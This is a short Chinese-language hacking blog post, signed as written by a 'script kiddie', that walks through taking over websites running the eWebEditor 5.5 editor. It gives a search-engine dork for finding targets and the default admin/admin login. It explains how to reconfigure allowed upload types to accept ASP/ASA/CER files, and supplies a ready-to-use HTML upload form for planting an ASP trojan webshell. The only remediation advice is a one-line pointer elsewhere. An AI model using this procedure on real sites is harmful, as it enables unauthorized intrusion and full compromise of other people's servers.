作者:脚本小子

Google搜索:inurl:xxhs.asp?classid=

漏洞eWebEditor5.5

拿webshell方法

直接进后台eWebEditor/admin/login.asp

默认账号密码 admin admin

登陆后台点击“样式管理”

在popup样式管理

修改

路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx

图片类型比如就是我们要上传的ASP木马格式

上传路径:/

图片限制:写上1000 免的上不了我们的asp木马
上传内容不要写

然后我们就可以提交了
就可以看到样式增加成功!

然后把

下面的代码保存为scriptkiddies.html

<form action="www.webshell.cc/eWebEditor/asp/upload.asp?action=save&amp;type=image&amp;style=popup&amp;cusdir=scriptkiddies.asp" method="post" name="myform" enctype="multipart/form-data"><input type="file" name="uploadfile" size="100" /> <input type="submit" value="upload" /></form>

然后上传我们刚才的asp或ASA格式木马

你懂的.

修复:又是编辑器漏洞,参考本站以前文章

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/623.html